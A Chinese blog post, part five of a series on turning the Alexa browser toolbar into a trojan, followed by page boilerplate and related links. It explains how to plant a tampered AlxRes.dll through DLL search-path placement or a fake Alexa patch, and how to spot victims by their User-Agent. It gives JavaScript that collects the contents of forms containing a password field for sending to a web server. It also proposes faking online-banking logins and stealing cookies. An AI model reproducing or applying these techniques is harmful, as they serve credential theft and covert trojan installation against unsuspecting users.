把Alexa工具条改装成木马(5)

最新推荐文章于 2008-06-29 20:54:00 发布
最新推荐文章于 2008-06-29 20:54:00 发布
阅读量1.2k 收藏
点赞数
分类专栏: SEO 文章标签: 工具 web服务 ie function windows c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baggio785/article/details/515085
版权
五、散布和植入木马

  以上代码均是用PE资源软件修改AlxRes.dll文件实现的。所以,只要用新的AlxRes.dll文件将原来系统的AlxRes.dll替换掉。Alexa工具条在加载的时候会优先在"C:/Program Files/Internet Explorer"和"C:/Documents and Settings/[username]/桌面"这两个路径下搜索AlxRes.dll,所以也可以把修改过的AlxRes.dll放到这两个路径下,这样就不用覆盖源文件了。至于怎么安装,那可是有一大堆的IE漏洞等着你去Exploit呢,这可不是本文涉及的范围。

  安装了Alexa工具条的IE的"User-Agent"会加入"Alexa Toolbar"的标记,所以很容易区分目标的IE是否已经安装了Alexa工具条:

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toobar)

  也可以修改Alexa的安装文件,或者以Alexa补丁的名义来发布,这个就扯远了。

六、收集密码

  你可以用FileSystemObject控件来将表单内容纪录到文件,或者直接作为参数发送到某个Web服务器,由web服务器收集纪录下来即可。为了在客户端过滤一些不包含密码的表单,最好在AlxRes.dll的代码中对收集的表单数据进行一些检查:

function test()
{
var IsPwdForm=false;
var FormStr;
try{
for(i=0;i<this.length;i++)
{
if(this.elements[i].name!="")
{
if(this.elements[i].type=="password")
IsPwdForm=true;
FormStr=FormStr+this.elements[i].name+"="+this.elements[i].value+"&";
}
}
if(IsPwdForm)
{
//表单包含密码文本,进行收集
}
}catch(e){}
return true;
}


七、其他的应用

  大多数的网上银行登陆界面是由ActiveX控件实现的,无法截获表单数据,但是我们可以通过"oWebBrowser2"对象来操纵、修改浏览的页面,当然也可以伪造一个网上银行的登陆界面。还可以用来收集用户浏览网页的纪录,也可以用来窃取用户COOKIE等。
baggio785
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Alexa工具条下载
02-01
Alexa工具条是全球通用的网站排名工具,有长达十万个网址的全球网站排行榜。 Alexa工具条可以对某些特定的行业网站进行排名分析,并提供网站流量监测报告。 Alexa的浏览率统计是根据用户安装Alexa工具条Alexa ...
alexa工具条安装程序
03-16
就是alexa工具条的安装程序 呵呵,描述要长~~~~~
Alexa工具条改装成木马(2)
baggio785的专栏
10-24 1144
二、破解Alexa工具条   当然,Alexa也不是真傻,绝对不会蠢到让自己的代码被你用资源修改工具随便改。为了防止AlxRes.dll中的资源被随意修改,他采取了计算文件校验和的保护方法,要是发现文件被修改,就会拒绝加载。我们在修改代码前,必须破解这种保护机制。   AlxTB1.dll导出一个名叫ChecksumResources的函数,这个函数就是用来计算文件校验和的。用c32asm反汇编A
Alexa工具条改装成木马(1)
baggio785的专栏
10-24 1146
    Alexa是一个发布全球网站排名信息的网站,他的网址是http://www.alexa.com。Alexa通过在客户端安装Alexa工具条来收集采样全球网站的访问数据,以这些数据为依据对全球网站进行排名,类似于电视收视率的统计。Alexa工具条是一种类似于Google工具条的IE插件,你可以在下面URL中下载:http://download.alexa.com/index.cgi。 一、A
Alexa工具条改装成木马(3)
baggio785的专栏
10-24 1041
三、修改Alexa工具条的代码   熟悉IE编程的人都知道,DWebBrowserEvents2接口是用来接收WebBrowser的事件通知的,我们可以在AlxRes.dll的javascript代码中找到这些些对应的函数。在res://AlxRes.dll/SCRIPT/EVT.CLASS.JS的代码中,有一系列的javascript函数,对应于DWebBrowserEvents2接口的成员,如
Alexa工具条改装成木马(4)
baggio785的专栏
10-24 1165
四、截获网页表单的内容   我现在使用的方法有些类似于"跨站点脚本执行漏洞"。先来看看"res://AlxRes.dll/SCRIPT/EVT.CLASS.JS"中的"BP_onDocumentComplete"函数: function BP_onDocumentComplete(oParentWebBrowser2, oWebBrowser2, sURL);   该函数在IE的当前浏览页面被加载
安装ALEXA工具条
左直拳的马桶_日用桶
06-29 3102
安装ALEXA工具条  一、安装在IE下用IE打开http://www.alexa.com/site/download,点“Install Now”图标,下载。IE6下一般可以成功。如果有问题,可以看看是否被防毒软件拦截。IE7就比较麻烦。我分别在几台XP操作系统的机器上装,都不顺利,并且是遇到不同的问题:1、安装后无显示原因一,没有加载ALEXA现象为菜单栏的
Alexa工具条正确安装方法 Alexa工具条正确使用方法 Alexa工具条正确应用
编程爱好者
03-29 5958
 作者:Alexa专家 来源:夏天夫的BLOG安装alexa之前应有的认识:这个监测软件有如下的问题,必须明白a) Alexa和amazon自己网站的流量统计数字偏高b) Alexa Toolbar只能内嵌于IE浏览器,因此采用其它浏览器(比如AOL/netscape)的网民无法统计在内c) Alexa Toolbar只适用于Window操作系统,采用其它操作系统的网民无法统计在内d) 受地域
点这里安装Alexa工具条
编程爱好者
03-29 1199
一直以来,人们关注的焦点是某一特定网站在各大搜索引擎中(如Google, Yahoo!, AltaVista, MSN等)的排位问题,但这一排位是基于关键字(Keywords)搜索结果的,由于关键字选用上的随意性或文化差异因素,往往导致搜索结果和排位的不同,而且各个搜索引擎的排位规则、更新周期和收录的URL不尽相同,缺乏一个评价指标来对一个网站的世界排名进行综合评估,这时便需要参考Alexa所提供
模仿 alexa 工具条
周海汉的开发专栏
04-24 1688
alexa的统计越来越受到国内网站的重视,这也成为广告投放和投资的重要依据. alexa统计是通过工具条来获取样本的.根据每百万安装有工具条的人中访问该网站的一个比率,结合其内部的算法,得到一个网站的流量排名。但是由于中国人安装该工具条的人少,而外国人访问中文网站的也少,所以其流量统计对中国网站是不公平的,不能真实反映中国网站的流量。因此,一些网站为了提高alexa排名,不得不采用舞弊的手段。下面
安装alexa工具条报毒
Scc_166的专栏
05-03 274
 从alexa.com下载工具条,在安装时360safe报恶意广告插件, 卡巴报木马,主要就是想看看雅酷媒体http://www.yacooo.cn这个网站的排名情况. 现在看来暂时还看不了,可惜
alexa工具条提供alexa排名刷网站排名必要
08-19
**Alexa工具条及其在网站排名中的作用** Alexa工具条Alexa公司推出的一款浏览器插件,主要用于帮助用户查看全球互联网网站的访问量排名。这个工具条在20世纪90年代末期非常流行,因为它是评估网站流量和影响力的...
ALEXA工具条for IE8,IE9
11-12
解决IE8安装ALEXA工具条不兼容 亲测可用Alexa.9.0.0.31.rar 最高支持到IE9,先安装它,需要您先在IE的高级选项里打开"第三方插件支持"后才能显示出Alexa工具条,和工具-管理加载项里调用出来。 如果还不行,再安装...
alexa工具条
10-29
alexa工具条alexa公司推出的一款IE浏览器插件,下载安装后,会在地址栏的下面出现一条alexa工具条,当你访问某个网站时,在alexa工具条中就会出现该网站的alexa世界排名情况。通过alexa工具条可以显示被访问网站...
GOOGLE服务列表
baggio785的专栏
05-06 5576
Google Ad Sense  https://www.google.com/adsense/ Google AdWords  https://adwords.google.com/select Google分析   http://google.com/analytics/ Google问答   http://answers.google.com/ GoogleBase   http://bas
Google爬虫IP 地址大全
baggio785的专栏
05-06 5002
Google爬虫的IP地址如下,大家在分析日志的时候可以作参考64.68.80.*64.68.81.*64.68.82.*64.68.84.*64.68.88.*216.239.46.*216.239.38.*216.239.36.*
google搜索原理论文
baggio785的专栏
12-13 4804
这篇文章中,我们介绍了google,它是一个大型的搜索引擎(of a large-scale search engine)的原型,搜索引擎在超文本中应用广泛。Google的设计能够高效地抓网页并建立索引,它的查询结果比其它现有系统都高明。这个原型的全文和超连接的数据库至少包含24000000个网页。我们可以从http://google.stanford.edu/ 下载。 设计搜索引擎是一项
GOOGLE服务器列表(保证全部真实可用)
baggio785的专栏
02-23 4601
掌握了这些GOOGLE服务器列表,对google是否为DANCE有相当大的好处,以下的IP本人都一一测试过,保证都是正确的,如果各位老兄还有补充,请留言,小弟在这里谢谢了64.233.161.99                     66.102.7.99                         66.102.7.104216.239.59.99                
网站情报信息搜集工具与方法入门篇ppt课件.ppt
最新发布
11-16
网站流量分析可以借助Google Search、Google Trends和Alexa工具,它们能提供关于搜索引擎收录页面数、流量趋势和网站关注度的数据。 此外,网站订单量的分析可以通过第三方支付工具,如支付宝,来追踪交易数据。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值